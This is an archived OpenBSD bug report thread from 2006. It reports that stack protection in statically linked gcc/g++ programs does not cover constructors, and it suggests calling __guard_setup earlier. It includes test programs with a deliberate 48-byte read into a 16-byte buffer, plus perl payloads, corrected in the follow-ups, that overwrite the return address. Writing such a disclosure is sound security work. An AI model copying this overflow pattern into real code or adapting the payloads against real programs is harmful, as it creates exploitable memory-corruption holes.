system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

classic Classic list List threaded Threaded
3 messages Options
Reply | Threaded
Open this post in threaded view
|

system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

Paul Stoeber
>Number:         5229
>Category:       system
>Synopsis:       gcc,g++ - constructors in statically linked programs enjoy limited stack protection
>Confidential:   yes
>Severity:       serious
>Priority:       medium
>Responsible:    bugs
>State:          open
>Quarter:        
>Keywords:      
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Sep 06 22:10:01 GMT 2006
>Closed-Date:
>Last-Modified:
>Originator:     Paul Stoeber
>Release:        3.9
>Organization:
net
>Environment:
        System      : OpenBSD 3.9
        Architecture: OpenBSD.i386
        Machine     : i386
>Description:
$ cat x.c
#include <unistd.h>
#include <string.h>
static void f1(void) __attribute__((constructor));
static void f1(void) {
  char buf[16];
  read(0, buf, 48);
}
static void f2(void) {
  write(1, "surprise\n", 9);
  _exit(0);
}
int main() { return 0; }
$ gcc -static x.c
$ perl -e 'print "\0"x44,"\x51\x03\x00\x1c"' | ./a.out
surprise
$ cat x.cpp
#include <unistd.h>
class A { public: A(); };
A::A() {
  char buf[16];
  read(0,buf,48);
}
A a;
static void f2(void) {
  write(1, "surprise\n", 9);
  _exit(0);
}
int main() { return 0; }
$ g++ -static x.cpp
$ perl -e 'print "\0"x44,"\xa0\x03\x00\x1c"' | ./a.out
surprise
$ uname -mrsv
OpenBSD 3.9 GENERIC#617 i386
$

The snapshot of Sep 2 2006 also has this problem.

>How-To-Repeat:
>Fix:
Invoke __guard_setup earlier?


>Release-Note:
>Audit-Trail:
>Unformatted:

Reply | Threaded
Open this post in threaded view
|

Re: system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

Paul Stoeber
The overrun demos are wrong.  Sorry.  Try

perl -e 'print "\0"x44,pack("I",0x'$(objdump -t a.out | awk '/f2.?$/{print $1}')')' | ./a.out

instead, in both cases.

Reply | Threaded
Open this post in threaded view
|

Re: system/5229: gcc,g++ - constructors in statically linked programs enjoy limited stack protection

Paul Stoeber
In reply to this post by Paul Stoeber
The following reply was made to PR system/5229; it has been noted by GNATS.

From: Paul Stoeber <[hidden email]>
To: [hidden email], [hidden email]
Cc:  
Subject: Re: system/5229: gcc,g++ - constructors in statically linked
 programs enjoy limited stack protection
Date: Wed, 6 Sep 2006 22:51:28 +0000

 The overrun demos are wrong.  Sorry.  Try
 
 perl -e 'print "\0"x44,pack("I",0x'$(objdump -t a.out | awk '/f2.?$/{print $1}')')' | ./a.out
 
 instead, in both cases.